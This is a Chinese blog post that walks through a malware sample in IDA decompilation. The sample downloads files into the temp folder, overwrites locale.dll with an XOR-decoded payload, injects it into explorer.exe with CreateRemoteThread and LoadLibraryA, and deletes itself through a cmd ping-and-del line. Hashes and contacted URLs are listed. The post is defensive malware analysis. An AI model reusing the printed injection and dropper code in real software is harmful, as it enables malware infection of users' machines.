火绒一面病毒样本分析

最新推荐文章于 2022-04-15 18:30:00 发布
最新推荐文章于 2022-04-15 18:30:00 发布
阅读量1.2k 收藏 2
点赞数 1
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45771413/article/details/115739685
版权

样本信息

MD5: 6E4B0A001C493F0FCF8C5E9020958F38

SHA1:BEA213F1C932455AEE8FF6FDE346B1D1960D57FF

CRC32: 1CD8074D

查壳

无壳

在这里插入图片描述

手动分析

主函数
int __cdecl main(int argc, const char **argv, const char **envp)
{
………………
  v77 = v3;
  v78 = retaddr;
  v76 = -1;
  v75 = &loc_F400D;
  v74 = NtCurrentTeb()->NtTib.ExceptionList;
  v73 = &v79;
  v55 = 0;
  v4 = GetConsoleWindow();
  ShowWindow(v4, 0);                            // ShowWindow(GetConsoleWindow(),SW_HIDE) 隐藏终端程序端口
  sub_D2190("procmon");                         // procmon,微软出品 监视软件运行
  sub_D2190("wireshark");                       // 打开wireshark?
  sub_D2190("procexp");                         // 第三方进程管理器,可以一键取代系统自带任务管理器,但是不能一键恢复,有微软的数字签名。
                                                // 留坑:一般用户应该没装这玩意儿,难不成自带
                                                // 
  if ( ExpandEnvironmentStringsA("%temp%", v64, 0x104u) )// 扩充环境字符串:将百分号封闭起来的环境变量名转换成那个变量的内容
                                                //      这里被赋值临时文件的路径
  {
    strcpy((char *)v56, "x.zip");               // 这里拼接字符串,mark下 x.zip
    memset(v70, 0, 0x104u);
    v5 = &v64[strlen(v64) + 1] - v64;
    v6 = &v69;
    while ( *++v6 )
      ;
    qmemcpy(v6, v64, v5);
    v8 = &v69;
    while ( *++v8 )
      ;
    *(_WORD *)v8 = 92;
    v10 = (char *)v56 + strlen((const char *)v56) + 1 - (char *)v56;
    v11 = &v69;
    while ( *++v11 )
      ;
    qmemcpy(v11, v56, v10);                     // qmemcpy赋值了一串路径:
                                                // C:\Users\HOLY-P~1\AppData\Local\Temp\x.zip
                                                // 
    strcpy(v71, "7z4..1v0r_teernvCos/adlowndom/coy.iturecusah.kww/w:/tpht");
    sub_D2990(v71);                             // http://www.kahusecurity.com/downloads/Converter_v0.14.7z
    sub_D2110(v71, v70);                        // Mark关键函数:传入converter下载网址和g.zip的文件地址进行处理,后面再步入详细分析。
                                                // 第一个参数是个url,下载格式转换软件的压缩包
                                                // 第二个参数是 C:\Users\HOLY-P~1\AppData\Local\Temp\x.zip
    if ( GetFileAttributesA(v70) != 34 )        // 获取g.zip文件属性
      SetFileAttributesA(v70, 0x22u);
    v70[0] = 0;
    LOBYTE(v56[0]) = 103;
    v13 = &v64[strlen(v64) + 1] - v64;
    v14 = &v69;
    while ( *++v14 )
      ;
    qmemcpy(v14, v64, v13);                     // v15 赋值字符串 \x.zip
    v16 = &v69;
    while ( *++v16 )
      ;
    *(_WORD *)v16 = 92;
    v18 = (char *)v56 + strlen((const char *)v56) + 1 - (char *)v56;
    v19 = &v69;
    while ( *++v19 )
      ;
    qmemcpy(v19, v56, v18);                     // v20的值 p
    strcpy(v72, "jp3.r-pepallway-wa-angyifls-owcrs/gema/iom.ceflierap/p:/tphtg");
    sub_D2990(v72);
    sub_D2110(v72, v70);                        // 第二次调用该函数。得URL:
                                                // http://paperlief.com/images/crows-flying-away-wallpaper-3.jpg
    if ( GetFileAttributesA(v70) != 34 )        // 判断C:\Users\HOLY-P~1\AppData\Local\Temp\g.zip的文件属性
      SetFileAttributesA(v70, 0x22u);
  }
  strcpy(v68, "CDf:ge\\\\gwefiilnscdyuoqwwlfsas\\\\/s45y0cscxtddefem21332243\\\\9lkkooocvvaaalefeee...drolwel");
  memset(v62, 0, sizeof(v62));
  v76 = 0;
  v21 = 15;
  v61.dwProcessId = 0;
  v61.dwThreadId = 15;
  LOBYTE(v60[0]) = 0;
  v55 = 1;
  v58 = 0;
  v59 = 15;
  LOBYTE(v57[0]) = 0;
  sub_D4BE0(v57, v68, &v68[strlen(v68) + 1] - &v68[1]);// 这里是最后一次用到上面的乱序字符串,但是依旧没有处理
  LOBYTE(v76) = 1;
  v22 = 0;
  v56[0] = v58;
  if ( v58 > 0 )
  {
    for ( i = 0; ; i = v61.dwProcessId )        // 循环到 i=29退出
    {
      v24 = v57;
      if ( v59 >= 0x10 )
        v24 = (_DWORD *)v57[0];
      v25 = *((_BYTE *)v24 + v22);
      v54 = v25;
      if ( i >= v21 )
      {
        LOBYTE(v53) = 0;
        sub_D53F0(v60, i, v53, v54);
      }
      else
      {
        v61.dwProcessId = i + 1;
        v26 = v60;
        if ( v21 >= 0x10 )
          v26 = (_DWORD *)v60[0];
        *((_BYTE *)v26 + i) = v25;
        *((_BYTE *)v26 + i + 1) = 0;
      }
      v21 = v61.dwThreadId;
      v22 += 3;
      if ( v22 >= v56[0] )
        break;
    }
  }
  LOBYTE(v76) = 0;
  if ( v59 >= 0x10 )
  {
    v27 = (void *)v57[0];
    if ( v59 + 1 >= 0x1000 )
    {
      if ( v59 + 36 <= v59 + 1
        || (v57[0] & 0x1F) != 0
        || (v27 = *(void **)(v57[0] - 4), (unsigned int)v27 >= v57[0])
        || (unsigned int)(v57[0] - (_DWORD)v27) < 4
        || (unsigned int)(v57[0] - (_DWORD)v27) > 0x23 )
      {
        _invalid_parameter_noinfo_noreturn();
      }
    }
    sub_D85BE(v27);
  }
  v28 = (char *)v60[0];                         // 赋值:C:\windows\system32\locale.dll
  v29 = (char *)v60;
  if ( v21 >= 0x10 )
    v29 = (char *)v60[0];                       // 这里赋值 C:\windows\system32\locale.dll
  v30 = (_BYTE *)(v62 - v29);
  do
  {
    v31 = *v29++;
    v29[(_DWORD)v30 - 1] = v31;
  }
  while ( v31 );
  v76 = -1;
  if ( v21 >= 0x10 )
  {
    v32 = v21 + 1;
    v33 = v28;                                  // 赋值 C:\windows\system32\locale.dll
    if ( v32 >= 0x1000 )
    {
      if ( v32 + 35 <= v32
        || ((unsigned __int8)v28 & 0x1F) != 0
        || (v28 = (char *)*((_DWORD *)v28 - 1), v28 >= v33)
        || (v34 = v33 - v28, v34 < 4)
        || v34 > 0x23 )
      {
        _invalid_parameter_noinfo_noreturn();
      }
    }
    sub_D85BE(v28);
  }
  sub_D2690(v62);                               // Mark关键函数:这个函数有 explore.exe,正常是Windows图形化界面,
                                                // 但很多病毒喜欢伪装成这个名字
  GetModuleFileNameA(0, v67, 0x104u);           // 获取exe文件绝对路径,这里获取到病毒样本所在的路径
  v35 = GetFileAttributesA(v67);                // 获取本体文件的属性
  SetFileAttributesA(v67, v35 & 0xFFFFFFFE);    // 修改本体文件的属性
  memset(&v52, 0, sizeof(v52));
  v52.cb = 68;
  v61 = 0i64;
  v52.wShowWindow = 6;
  strcpy(v65, "636D642E657865202F432070696E67203132372E302E302E312026262064656C20");
  v52.dwFlags = 1;
  memset(v66, 0, sizeof(v66));
  memset(v63, 0, sizeof(v63));
  v36 = (const char *)sub_D1F00(v57, v65);
  v37 = v36;
  if ( *((_DWORD *)v36 + 5) >= 0x10u )
    v37 = *(const char **)v36;
  v38 = v37;                                    // edx赋值给esi:cmd.exe /C ping 127.0.0.1 && del
  v39 = strlen(v37) + 1;                        // 循环后值为34,是cmd.exe /C ping 127.0.0.1 && del \00 +1的长度
  v40 = &v62[511];
  while ( *++v40 )
    ;
  qmemcpy(v40, v38, 4 * (v39 >> 2));
  v43 = &v38[4 * (v39 >> 2)];
  v42 = &v40[4 * (v39 >> 2)];
  v44 = v39;
  v45 = v59;
  qmemcpy(v42, v43, v44 & 3);
  if ( v45 >= 0x10 )
  {
    v46 = (void *)v57[0];
    v47 = v45 + 1;
    if ( v47 >= 0x1000 )
    {
      if ( v47 + 35 <= v47
        || (v57[0] & 0x1F) != 0
        || (v46 = *(void **)(v57[0] - 4), (unsigned int)v46 >= v57[0])
        || (unsigned int)(v57[0] - (_DWORD)v46) < 4
        || (unsigned int)(v57[0] - (_DWORD)v46) > 0x23 )
      {
        _invalid_parameter_noinfo_noreturn();
      }
    }
    sub_D85BE(v46);
  }
  v48 = &v67[strlen(v67) + 1] - v67;
  v49 = &v62[511];
  while ( *++v49 )
    ;
  qmemcpy(v49, v67, v48);                       // 0  病毒样本所在地址 41
  CreateProcessA(0, v63, 0, 0, 1, 0x8000000u, 0, 0, &v52, &v61);
  return 0;
}
主函数分析补充

访问
http://www.kahusecurity.com/downloads/Converter_v0.14.7z
另存文件到 C:\Users\HOLY-P~1\AppData\Local\Temp\x.zip

打开这个网址,看url应该是下载 Converter_v0.14.7z文件,格式转换??

在这里插入图片描述

搜索该网站下的版权声明找到了官网……貌似是个安全公司

在这里插入图片描述

可能是官网有变动,我在官网里找下载工具,找到converter,版本也是0.14。最后更新日期2016.9.30

恶意软件在安全团队官网下格式转换工具……太骚了_(:з」∠)_

在这里插入图片描述

------------下一处下载-----------------
访问
http://paperlief.com/images/crows-flying-away-wallpaper-3.jpg
另存文件到 C:\Users\HOLY-P~1\AppData\Local\Temp\g.zip

该URL访问后加载不出来图片……

综上两个文件的网址都无法访问,所以后面分析时并没有x.zip和g.zip文件生成

关键函数Ⅰ sub_D2110

下载文件到指定地址并重命名

char __fastcall sub_11F2110(LPCSTR a1, LPCSTR a2)
{
  HRESULT v4; // esi
  int v5; // eax
  char result; // al
  int v7; // edx
  int v8; // ecx
  int v9; // eax

  DeleteUrlCacheEntry(a1);
  v4 = URLDownloadToFileA(0, a1, a2, 0, 0);     // a1:http://www.kahusecurity.com/downloads/Converter_v0.14.7z
                                                // a2:C:\Users\HOLY-P~1\AppData\Local\Temp\x.zip
                                                // URLDownloadToFile,指从指定URL地址读取内容并将读取到的内容保存到特定的文件里的实现方法。
                                                // 那这里应该是下载converter v0.14.zip到用户临时文件夹下,并命名为 x.zip(
                                                // 难怪分析main函数的时候,执行完这个函数在temp文件夹下找不到x.zip。应该是converter的下载网址换了导致无法下载。
                                                // --------------------------------------------
                                                // 后面该函数又被调用了一次,这次是
                                                // 下载文件:http://paperlief.com/images/crows-flying-away-wallpaper-3.jpg
                                                // 保存为:C:\Users\HOLY-P~1\AppData\Local\Temp\g.zip
  if ( v4 < 0 )
  {
    v7 = sub_11F5060();
    if ( v7 )
      v8 = v7 + *(_DWORD *)(*(_DWORD *)v7 + 4);
    else
      v8 = 0;
    *(_DWORD *)(v8 + 20) = *(_DWORD *)(v8 + 20) & 0xFFFFF9FF | 0x800;
    v9 = sub_11F3180(v7, v4);
    sub_11F5330(v9);
    result = 0;
  }
  else
  {
    v5 = sub_11F5060();
    sub_11F5330(v5);
    result = 1;
  }
  return result;
}
关键函数Ⅱ sub_D2690

篡改 locale.dll

HANDLE __thiscall sub_D2690(LPCVOID lpBuffer)
{
  …………
  v1 = (const char *)lpBuffer;
  *(_DWORD *)Buffer = lpBuffer;
  v2 = CreateFileA((LPCSTR)lpBuffer, 0xC0000000, 0, 0, 2u, 0x80u, 0);// 创建文件,返回句柄到v2
  if ( v2 == (HANDLE)-1 )                       // 这里跳过异常,该if不执行
  {
    *(_DWORD *)Buffer = 0;
    v10 = GetLastError();
    if ( FormatMessageA(0x3100u, 0, v10, 0, Buffer, 0, 0) && *(_DWORD *)Buffer )
    {
      *(_BYTE *)(strlen(*(const char **)Buffer) + *(_DWORD *)Buffer - 2) = 0;
      GetLastError();
      sub_D1160(v14, "%0.*s (0x%x)", 2032);
      LocalFree(*(HLOCAL *)Buffer);
    }
    else
    {
      v14[0] = 0;
    }
    result = (HANDLE)sub_D10E0("\nLASTERROR: %s", v14);
  }
  else
  {
    v3 = 0;
    NumberOfBytesWritten = 0;
    do
    {
      ::Buffer[v3] = (__int128)_mm_xor_si128((__m128i)xmmword_101340, (__m128i)::Buffer[v3]);
      xmmword_1049C0[v3] = (__int128)_mm_xor_si128((__m128i)xmmword_101340, (__m128i)xmmword_1049C0[v3]);
      xmmword_1049D0[v3] = (__int128)_mm_xor_si128((__m128i)xmmword_1049D0[v3], (__m128i)xmmword_101340);
      xmmword_1049E0[v3] = (__int128)_mm_xor_si128((__m128i)xmmword_101340, (__m128i)xmmword_1049E0[v3]);
      v3 += 4;
    }
    while ( v3 < 4448 );
    WriteFile(v2, ::Buffer, 0x11600u, &NumberOfBytesWritten, 0);
    CloseHandle(v2);
    Sleep(0xC8u);
    Sleep(0xC8u);
    sub_D2360();
    v4 = 0;
    v5 = CreateToolhelp32Snapshot(0xFu, 0);     // 获取系统中正在运行的进程、线程信息,建立一个快照
    pe.dwSize = 296;
    if ( Process32First(v5, &pe) )              // Process32First和Process32Next配合使用
                                                // 枚举上面CreateToolhelp32Snapshot创建的快照里的所有进程
    {
      while ( _stricmp(pe.szExeFile, "explorer.exe") )// 遍历快照内的所有进程,
                                                // 查看当前进程 pe.szExeFile 是否名为 explorer.exe
      {
        if ( !Process32Next(v5, &pe) )
          goto LABEL_9;
      }
      v4 = pe.th32ProcessID;
LABEL_9:
      v1 = *(const char **)Buffer;
    }
    CloseHandle(v5);
    *(_DWORD *)&pe.szExeFile[108] = 148;
    result = (HANDLE)GetVersionExA((LPOSVERSIONINFOA)&pe.szExeFile[108]);
    if ( result )
    {
      result = *(HANDLE *)&pe.szExeFile[112];
      if ( *(_DWORD *)&pe.szExeFile[112] == 5 || *(_DWORD *)&pe.szExeFile[112] >= 6u )
      {
        result = OpenProcess(0x43Au, 0, v4);
        v7 = result;
        if ( result )
        {
          v8 = VirtualAllocEx(result, 0, strlen(v1), 0x3000u, 0x40u);// 在locale.dll的虚拟空间保留或提交内存区域
          result = (HANDLE)WriteProcessMemory(v7, v8, v1, strlen(v1), 0);// 对locale.dll进行改写,
                                                // 从地址0x33f0000开始,
          if ( result )
          {
            v9 = GetModuleHandleA("kernel32.dll");// 调用locale.dll
            result = GetProcAddress(v9, "LoadLibraryA");
            if ( result )
            {
              CreateRemoteThread(v7, 0, 0, (LPTHREAD_START_ROUTINE)result, v8, 0, 0);// 让locale.dll在其他地址空间中运行
              result = (HANDLE)CloseHandle(v7);
            }
          }
        }
      }
    }
  }
  return result;
}
单独分析篡改后的 locale.dll

IDA主函数分析的时候发现locale.dll被篡改并另启运行,但是在C:\windows\system32\下找不到 locale.dll……

火绒剑:动作过滤,只看文件监控日志,很快就找到了locale.dll的位置了(๑•̀ㅂ•́)و✧

在这里插入图片描述

破案,去SYSWOW64 !

用ida分析,找到了一串疑似URL的字符串。尝试动调时发现需要病毒样本才能正常加载,看来这个locale.dll确实就是被篡改过的。

在这里插入图片描述

技艺不精,用IDA调试dll时,由于病毒样本运行后删除自身所以没法断下,OD也不会调试DLL……好在改乱序字符串下就是排序代码,直接手敲得到真正的URL:

http://d1picvugn75nio.cloudfront.net

再往下走,有个ShellExecuteA,作用是最大化窗口打开该网址 (可能年代久远,该网站现在无法访问……)

病毒样本运行流程总结

隐藏程序端口
打开procmon wireshark procexp
获取用户的临时文件的路径

关键函数:sub_d2110
生成C:\Users\HOLY-P~1\AppData\Local\Temp\x.zip的路径
生成一个URL:http://www.kahusecurity.com/downloads/Converter_v0.14.7z
下载convert,并命名为x.zip保存到C:\Users\HOLY-P~1\AppData\Local\Temp\
生成一个URL:http://paperlief.com/images/crows-flying-away-wallpaper-3.jpg
下载convert,并命名为g.zip保存到C:\Users\HOLY-P~1\AppData\Local\Temp\

生成路径C:\windows\system32\locale.dll

关键函数:sub_D2690
获取系统正在运行的进程、线程,建立一个快照
遍历快照内的所有进程确定存在explorer.exe后执行下一步
对locale.dll进行改写(从 0x33f0000开始)
运行locale.dll 打开网址http://d1picvugn75nio.cloudfront.net

打开cmd.exe 
ping 127.0.0.1
删除自身
(此时被篡改的locale.dll仍存在于C:\windows\SysWOW64\ ,未被删除)

可疑行为

C:\Users\本机用户名\AppData\Local\Temp\路径下下载了两个文件,并重命名为g.zip和x.zip

进程中的 locale.dll内容被篡改

篡改后的locale.dll作用是打开网址:http://d1picvugn75nio.cloudfront.net

运行后删除自身,毁尸灭迹。但篡改后的locale.dll依旧存在,并且系统显示其修改日期仍是2009.7.14,不易被发现。

Holy-Pang
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
火绒安全一面病毒样本分析
innovation的博客
03-15 1469
Summary: 病毒高危行为: 请求一系列加密的未知IP的443端口,连接可能与其他恶意软件通讯;尝试HTTP但是全都失败了 使用了大量的微软提供的加密函数,已知是AES对称加密 过程中怀疑使用了代码混淆 存在多处绕检测,反调试行为:比如频繁分配内存调用native方法,存在用另一个用户开启线程;多处使用了RDTSC指令来比对执行时间检测虚拟化或反调试;存在大量延迟尝试绕检测;存在LdrLoadDll动态调用绕检测;可能读取PEB信息检测调试器;修改token权限 MD5 974d669.
病毒工具-火绒
KD的疯狂实验室
08-05 1万+
这是一款由杀软公司支持的AntiRootkit,行之有效的监视记录功能使其成为手工分析样本的利器.作为火绒(杀软)的可选组件提供给用户. ......你想判断一款程序是否是恶意程序?你想要了解自己电脑的安全状况?选择它准没错
某绒面试的病毒分析(二)
weixin_30698527的博客
07-03 586
分析系列二,由于我个人对病毒分析也不行,然后我们这次就用到火绒剑这款工具和ida来简单的看下病毒的行为,按照下面截图所示从上面火绒剑的显示我们可以看到这个病毒做了下面的几个操作对三处文件做了修改或生成,然后更改了注册表项HEKY_LOCAL MACHINE……,然后又设置http指定到carder.bit 设置连接ip为66.171.248.178:80然后我们在载入ida看下导入表,看到ADVA...
病毒分析
bilibili的博客
09-21 784
~\(≧▽≦)/~啦啦啦
[ctf.show.reverse] flag白给,签退
weixin_52640415的博客
04-15 1079
flag白给: window题,UPX壳,去壳后找到“成功了”串,向前找引用到TForm1_Button1Click函数,这个函数里对字符串没有加密而直接比较,找到对应的串加上flag{}包裹即可 int __fastcall TForm1_Button1Click(int a1) { int v1; // edx unsigned int v3[2]; // [esp-10h] [ebp-14h] BYREF int *v4; // [esp-8h] [ebp-Ch] int v5;
火绒病毒引擎简介.pdf
01-06
火绒病毒引擎是一款由北京火绒网络科技有限公司开发的专业反病毒解决方案。该引擎以其高效的"反病毒‘芯’技术"为核心,旨在为用户提供强大的病毒查杀能力,保护计算机系统免受恶意软件的侵害。 反病毒引擎概述:...
火绒病毒引擎简介.docx
01-06
火绒病毒引擎是一款高效的反恶意软件解决方案,其设计旨在检测、识别并清除各种形式的恶意代码,包括病毒、木马、宏病毒、感染型病毒等。引擎的核心功能包括特征扫描、启发式扫描、动态行为分析和大数据统计分类,...
火绒病毒引擎简介.xmind
01-06
新是火绒病毒引擎简介
勒索病毒WannaCry深度技术分析
08-01
勒索病毒,WannaCry,想哭,深度技术分析。勒索病毒自从2017年开始全球泛滥,并且愈演愈烈,引起了广泛关注和广大技术爱好者的兴趣。这也给安全厂商带来了挑战。
AopDemo 一位大神些的高级 c# Aop切面的demo
02-08
AopDemo 一位大神些的高级 c# Aop切面的demo,让你方便了解和学会aop的精髓.
记一次带有FSG壳的熊猫烧香病毒分析过程
richard1230的博客
04-02 5715
样本概况 样本信息 测试环境以及工具 分析目标 具体行为分析 0利用查壳工具查看 1.利用PChunter 2.手工清理 3.利用火绒剑进行主要行为分析 恶意行为的一个简要小结 4.脱壳 病毒恶意行为分析(OD结合IDA双剑合璧) 知识点扩展1: 知识点扩展1小结: 知识点扩展2 知识点扩展3 知识点扩展4(编辑函数标签:) 知识点扩展5(有关seh链的:) 知识点扩展6(Del...
TEB(线程环境块)学习
weixin_44156885的博客
09-11 5038
文章目录TEBTEB结构中的两个重要成员NtTib成员PEB成员PEB.BeingDebuggedPEB.ImageBaseAddressPEB.LdrPEB.ProcessHeap & PEB.NtGolbalFlag TEB TEB结构中的两个重要成员 +0x000 NtTib :_NT_TIB . . . +0x30 ProcessEnvironmentBlock ...
使用Process Monitor对病毒进行行为分析
weixin_43742894的博客
05-04 3756
使用火绒剑/Procss Moniter对病毒进行行为分析。 Process Monitor是一个经典的进程行为分析软件,火绒剑作为火绒的一个工具,专门作为病毒行为分析的工具,非常好用,本文以熊猫烧香为例进行行为分析。 实验环境及工具 win7 x86 Process Monitor(因为火绒剑在病毒运行后打不开窗口) 行为分析 第一步:运行“”熊猫烧香,并进行监控 使用过滤器,对PID 2724...
Windows内核基础之KPCR
tutucoo
12-07 1102
1.概述 KPCR是CPU的一个结构体,它就像EPROCESS对于进程,ETHREAD对于线程,KPCR对于CPU是非常重要的,它的全称是Processor Control Region。 fs:[0]在3环时指向TEB,在0环时指向KPCR,每一个CPU核心都对应着一个KPCR,KPCR存储了CPU需要使用的一些重要信息,比如GDT\IDT以及线程相关的信息 2.KPCR结构体 nt!_KPCR...
DPC(延迟过程调用)的技术细节
lostit的专栏
11-01 1万+
-DPC(延迟过程调用)的细节 NTINSIDER,16卷,1期,1至2月2009 延迟过程调用(DPC)是一种Windows常用功能。用途是广泛和多样的,但最常用的是我们通常所说的“ISR完成”和WindowsTimer底层技术。    如果DPC常用,为什么还要写此篇?我们发现,大多数人并不真正了解DPC工作的底层实现细节。并且,事实证明,一个深入的理解,在选择选项创建DPC
查找kernel32.dll 基地址 SEH
x
08-09 208
根据SEH来找, teb.tib.exceptionlist 中最后一个EXCEPTION_REGISTRATION 异常处理函数在kernerl32 中 最后一个 EXCEPTION_REGISTRATION.prev = 0ffffffffh 根据这个特征找到EXCEPTION_REGISTRATION.handler , 去掉10000h, 模块都在64k边界上 .386 .model flat, stdcall option casemap:none include wind.
ECMAScript 6 (3)Promise 对象
孛儿只斤·苏日娜的日记
09-14 278
Promise 对象 1、含义 Promise 是异步编程的一种解决方案,所谓Promise,简单说就是一个容器,里面保存着某个未来才会结束的事件(通常是一个异步操作)的结果。从语法上说,Promise 是一个对象,从它可以获取异步操作的消息。Promise 提供统一的 API,各种异步操作都可以用同样的方法进行处理。 Promise对象有以下两个特点。 对象的状态不受外界影响。promise对象代表一个异步操作,有三种状态:pending(进行中)、fulfilled(已成功)和rejected(以失败
浅析一下火绒杀毒
热门推荐
wdone的博客
02-23 1万+
说明下:只是对火绒这款良心杀毒的好奇心而研究的。并没有什么恶意。希望火绒会越来越好。 火绒病毒库header结构如下: 红圈1:flag 红2:文件整体长度 红3:病毒库数量(建立索引数量) 红4:解压后的长度 红5:解压后去掉header后的长度 剩下是128个字节的解密key。 红6:flag。 prop是特征码的病毒库。 pset是病毒名称的病毒
火绒病毒引擎技术详解
火绒病毒引擎采用了火绒虚拟沙盒技术,这是一种高级的解码和动态行为分析方法,可以有效应对复杂的通用脱壳和多态性恶意代码。 引擎的架构设计注重轻量化和高效性,确保在提供强大保护的同时,对系统资源的影响...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值